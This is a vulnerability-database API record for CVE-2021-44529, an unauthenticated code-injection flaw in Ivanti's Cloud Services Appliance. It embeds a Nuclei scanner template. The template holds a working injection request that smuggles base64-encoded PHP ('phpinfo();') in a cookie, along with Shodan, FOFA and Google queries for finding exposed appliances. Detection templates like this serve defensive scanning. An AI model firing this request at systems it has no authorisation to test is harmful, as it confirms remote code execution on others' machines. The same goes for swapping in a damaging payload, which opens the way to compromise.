{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-44529/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-44529/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-44529/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-44529/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-44529/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-44529"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-44529"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2021/CVE-2021-44529.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2021-44529\n\ninfo:\n  name: Ivanti EPM Cloud Services Appliance Code Injection\n  author: duty_1g,phyr3wall,Tirtha\n  severity: critical\n  description: Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).\n  impact: |\n    Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.\n  remediation: |\n    Apply the latest security patches provided by Ivanti to mitigate this vulnerability.\n  reference:\n    - https://forums.ivanti.com/s/article/SA-2021-12-02\n    - https://twitter.com/Dinosn/status/1505273954478530569\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-44529\n    - http://packetstormsecurity.com/files/166383/Ivanti-Endpoint-Manager-CSA-4.5-4.6-Remote-Code-Execution.html\n    - https://github.com/SYRTI/POC_to_review\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-44529\n    cwe-id: CWE-94\n    epss-score: 0.99105\n    epss-percentile: 0.99932\n    cpe: cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: ivanti\n    product: endpoint_manager_cloud_services_appliance\n    shodan-query:\n      - title:\"LANDesk(R) Cloud Services Appliance\"\n      - http.title:\"landesk(r) cloud services appliance\"\n    fofa-query: title=\"landesk(r) cloud services appliance\"\n    google-query: intitle:\"landesk(r) cloud services appliance\"\n  tags: cve2021,cve,ivanti,epm,csa,injection,packetstorm,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /client/index.php HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"phpinfo()\"\n          - \"Cloud Services Appliance\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502204a789c64049b173e002524c56e041594aca601d418b7f2ed7050e0890afc5d0c022100b726facb0f050ea49dfdf97c6e35c05fe06f362cd232d5e8ff70721037fa0361:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2021-44529"
}